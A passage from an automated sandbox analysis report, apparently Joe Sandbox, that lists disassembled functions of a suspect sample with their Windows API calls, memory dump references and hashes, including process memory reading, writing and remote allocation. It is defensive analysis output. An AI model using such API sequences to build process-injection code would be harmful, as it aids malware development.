                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EFB033
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: bfd466000769624dd9960333ac254ba490ee756712d71a75b66d77a9082aa17f
                                                                                        • Instruction ID: 89d53d76da35f0dfb01d02d29f631635604e4475619ddb869433283e74b34733
                                                                                        • Opcode Fuzzy Hash: bfd466000769624dd9960333ac254ba490ee756712d71a75b66d77a9082aa17f
                                                                                        • Instruction Fuzzy Hash: 9F21A1F1A0020DEFDB109F55EC447AA7B68BB123A5F19432AF524E62E0C7B04945EB90
                                                                                        Function 00F0217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __calloc_crt.LIBCMT ref: 00F021A9
                                                                                        • CreateThread.KERNEL32(?,?,00F022DF,00000000,?,?), ref: 00F021ED
                                                                                        • GetLastError.KERNEL32 ref: 00F021F7
                                                                                        • _free.LIBCMT ref: 00F02200
                                                                                        • __dosmaperr.LIBCMT ref: 00F0220B
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 2664167353-0
                                                                                        • Opcode ID: f398b69e05949601b85fca2682c20d6e51cb4b7af97665e9afcfecbff70e4ebf
                                                                                        • Instruction ID: 59cd713c772142a142fdb31fa751a515b95e88fd7ae7163989acecd3c3777baf
                                                                                        • Opcode Fuzzy Hash: f398b69e05949601b85fca2682c20d6e51cb4b7af97665e9afcfecbff70e4ebf
                                                                                        • Instruction Fuzzy Hash: 61110433A04346AFEB11BFA5DC46DAB3B98EF04770B100429F928C61D1EB75E811B6B1
                                                                                        Function 00F1ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
                                                                                        • GetLastError.KERNEL32(?,00F1A69F,?,?,?), ref: 00F1ABE1
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00F1A69F,?,?,?), ref: 00F1ABF0
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00F1A69F,?,?,?), ref: 00F1ABF7
                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F1AC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 8a209800c92490f62b1f80108436e8f83040677eae301b2ce105046239fa1d00
                                                                                        • Instruction ID: ef009115ada1032b8f58c72546e0079b0a3bfbeef2c86ddc6aa2c80af6cc5ed6
                                                                                        • Opcode Fuzzy Hash: 8a209800c92490f62b1f80108436e8f83040677eae301b2ce105046239fa1d00
                                                                                        • Instruction Fuzzy Hash: EE018170B01209BFDB114FA5DC48DAB3BACEF8A3647100429F415C3250D6B1CC80EBA0
                                                                                        Function 00F19ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32 ref: 00F19ADC
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00F19AF7
                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00F19B05
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00F19B15
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 00F19B21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 2cd3cad22ba29effcaf774c1a7f9c7166f730c229e0d2df35a3c98e9bf824c6d
                                                                                        • Instruction ID: 3558dd1fbf885435a899d67a9473513d69cfaee4ee04c3d44ba183b171d2c8d8
                                                                                        • Opcode Fuzzy Hash: 2cd3cad22ba29effcaf774c1a7f9c7166f730c229e0d2df35a3c98e9bf824c6d
                                                                                        • Instruction Fuzzy Hash: 33018476B04209BFDB108F64ED58B997AEDEF84391F144028F905D3210D7B0DE40ABE0
                                                                                        Function 00F27A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27A74
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F27A82
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F27A8A
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F27A94
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: f9f6a3448d9b4dff646dd99e127e1b93a2bef00329c7e2abe0f067431a4860f8
                                                                                        • Instruction ID: f42934c679ddc5f7a944b41656fb4261fa1d6ea976dae071e6a9e969327fe897
                                                                                        • Opcode Fuzzy Hash: f9f6a3448d9b4dff646dd99e127e1b93a2bef00329c7e2abe0f067431a4860f8
                                                                                        • Instruction Fuzzy Hash: 4A016932D0962DEBDF00AFE5EC49ADDBB78FB09721F000046E512B2160DB789650ABA1
                                                                                        Function 00F1AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F1AADA
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AAE4
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AAF3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AAFA
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: d0942122fdafa4242d1c7c5d59061b2745ee17fb2ee521c495672be47f18b94f
                                                                                        • Instruction ID: 964e90abc78b1d62b73ffe67790f69c7b322029b77f66e1ab5707397ee9a4f91
                                                                                        • Opcode Fuzzy Hash: d0942122fdafa4242d1c7c5d59061b2745ee17fb2ee521c495672be47f18b94f
                                                                                        • Instruction Fuzzy Hash: 23F062717052487FEB125FA5FC88EA73BADFF8A768F000029F951C7190CAA19C45EB61
                                                                                        Function 00F1AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F1AA79
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F1AA83
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F1AA92
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F1AA99
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F1AAAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 79ef225271dbb873cfc782e93c0397710a73645004a77f38b251dde676d87e81
                                                                                        • Instruction ID: e48437b7294129cc0b4457ad06185048a452e57fd2a89e82794e1c2aafe9429a
                                                                                        • Opcode Fuzzy Hash: 79ef225271dbb873cfc782e93c0397710a73645004a77f38b251dde676d87e81
                                                                                        • Instruction Fuzzy Hash: A2F04F71701208BFEB115FA5AC89EB73BACFF4A764F000419F951C7190DAA59C41EA61
                                                                                        Function 00F1EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F1EC94
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F1ECAB
                                                                                        • MessageBeep.USER32(00000000), ref: 00F1ECC3
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00F1ECDF
                                                                                        • EndDialog.USER32(?,00000001), ref: 00F1ECF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 277d2a7aee9fe4252afb6c4bd4a74fcf03e524be5daa791f547215c0750856e2
                                                                                        • Instruction ID: 2c96cf70a8a7c5d0e97aa7f2c9516b4c82b4fde9f1668b363b52edc02a9c8578
                                                                                        • Opcode Fuzzy Hash: 277d2a7aee9fe4252afb6c4bd4a74fcf03e524be5daa791f547215c0750856e2
                                                                                        • Instruction Fuzzy Hash: 3D018130E00709ABEB245B10DE4EBD67BB8FB10705F040559F997A24E0DBF0AA84EBC0
                                                                                        Function 00EFB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00EFB0BA
                                                                                        • StrokeAndFillPath.GDI32(?,?,00F5E680,00000000,?,?,?), ref: 00EFB0D6
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EFB0E9
                                                                                        • DeleteObject.GDI32 ref: 00EFB0FC
                                                                                        • StrokePath.GDI32(?), ref: 00EFB117
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: 0409ede4f98915bbad57e8dfbfc99cbd806ec8fc25eddfc8262436d882cb5268
                                                                                        • Instruction ID: 95c10d46c65c611f0b7b5538a49e51cda4c4c3e30677356003544246e9617082
                                                                                        • Opcode Fuzzy Hash: 0409ede4f98915bbad57e8dfbfc99cbd806ec8fc25eddfc8262436d882cb5268
                                                                                        • Instruction Fuzzy Hash: 3BF03CB410060CEFDB219F65EC0C7A53F64BB123A6F088314F525941F0CB708966EF10
                                                                                        Function 00F2F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F2F2DA
                                                                                        • CoCreateInstance.OLE32(00F6DA7C,00000000,00000001,00F6D8EC,?), ref: 00F2F2F2
                                                                                        • CoUninitialize.OLE32 ref: 00F2F555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 948891078-24824748
                                                                                        • Opcode ID: 723af6f1ed1a48226fb95618088cb14accf019d446bd4741cb3b79dc0c8854d9
                                                                                        • Instruction ID: 2053281eafc8a05b63c28a4b9cc47484cc2d06d9e2a88613772e3a0b54959882
                                                                                        • Opcode Fuzzy Hash: 723af6f1ed1a48226fb95618088cb14accf019d446bd4741cb3b79dc0c8854d9
                                                                                        • Instruction Fuzzy Hash: AFA12C71504245AFD300EF64CC81DAFB7E8EF98714F40491DF655A7192EB70EA4ACBA2
                                                                                        Function 00F2E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE53B1,?,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE662F
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F2E85D
                                                                                        • CoCreateInstance.OLE32(00F6DA7C,00000000,00000001,00F6D8EC,?), ref: 00F2E876
                                                                                        • CoUninitialize.OLE32 ref: 00F2E893
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 7f7980e9f5334cb4d2bfcd30acb9df8dc1fe77c52f8a775f8a64012e7f1689ce
                                                                                        • Instruction ID: a716fe28c05ccb7937bf3a865fd5f1151247f6d765057066127897f57d6a0fa2
                                                                                        • Opcode Fuzzy Hash: 7f7980e9f5334cb4d2bfcd30acb9df8dc1fe77c52f8a775f8a64012e7f1689ce
                                                                                        • Instruction Fuzzy Hash: 45A14735A043159FCB10DF15C484D6ABBE5FF89320F148949F996AB3A2CB31EC45DB91
                                                                                        Function 00F0325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00F032ED
                                                                                          • Part of subcall function 00F0E0D0: __87except.LIBCMT ref: 00F0E10B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: ea9ba0144a192e12e2882029ec6cacbd81941c8bbe0b2f158b5e9dfee2d5c3d3
                                                                                        • Instruction ID: a6e137d71abef84d402757c0fba0f89bfbff9c52fde81f24c4e5624715575fea
                                                                                        • Opcode Fuzzy Hash: ea9ba0144a192e12e2882029ec6cacbd81941c8bbe0b2f158b5e9dfee2d5c3d3
                                                                                        • Instruction Fuzzy Hash: 24514872E0820596DB15BB14CD8137A3BACDB41730F348D69F4D5822E9DF398ED8BA46
                                                                                        Function 00F24606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F7DC50,?,0000000F,0000000C,00000016,00F7DC50,?), ref: 00F24645
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00F246C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                        • String ID: REMOVE$THIS
                                                                                        • API String ID: 3797816924-776492005
                                                                                        • Opcode ID: d11126bedfffc7776e6ec6c1fe52a39ed437b8d41cca796d7d198f84e936fef0
                                                                                        • Instruction ID: 4ff292e18862f562e268502b02adfef5cc2de44906183097c884439044171930
                                                                                        • Opcode Fuzzy Hash: d11126bedfffc7776e6ec6c1fe52a39ed437b8d41cca796d7d198f84e936fef0
                                                                                        • Instruction Fuzzy Hash: BA41E531A0026D9FCF00DF95D881AAEB7F4FF45314F148069E926AB292D7B4EC41DB40
                                                                                        Function 00F1C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F2430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F1BC08,?,?,00000034,00000800,?,00000034), ref: 00F24335
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F1C1D3
                                                                                          • Part of subcall function 00F242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F1BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00F24300
                                                                                          • Part of subcall function 00F2422F: GetWindowThreadProcessId.USER32(?,?), ref: 00F2425A
                                                                                          • Part of subcall function 00F2422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F2426A
                                                                                          • Part of subcall function 00F2422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F24280
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F1C240
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F1C28D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: bf812c5b7ad1e497af0037ed8ecfc1b0729ced55101e12941208e825332be98c
                                                                                        • Instruction ID: 2624efe4e7f6bb66ca5f47ea67b4a4f4b1015dd73f5e479fe1b677a0fdd9676c
                                                                                        • Opcode Fuzzy Hash: bf812c5b7ad1e497af0037ed8ecfc1b0729ced55101e12941208e825332be98c
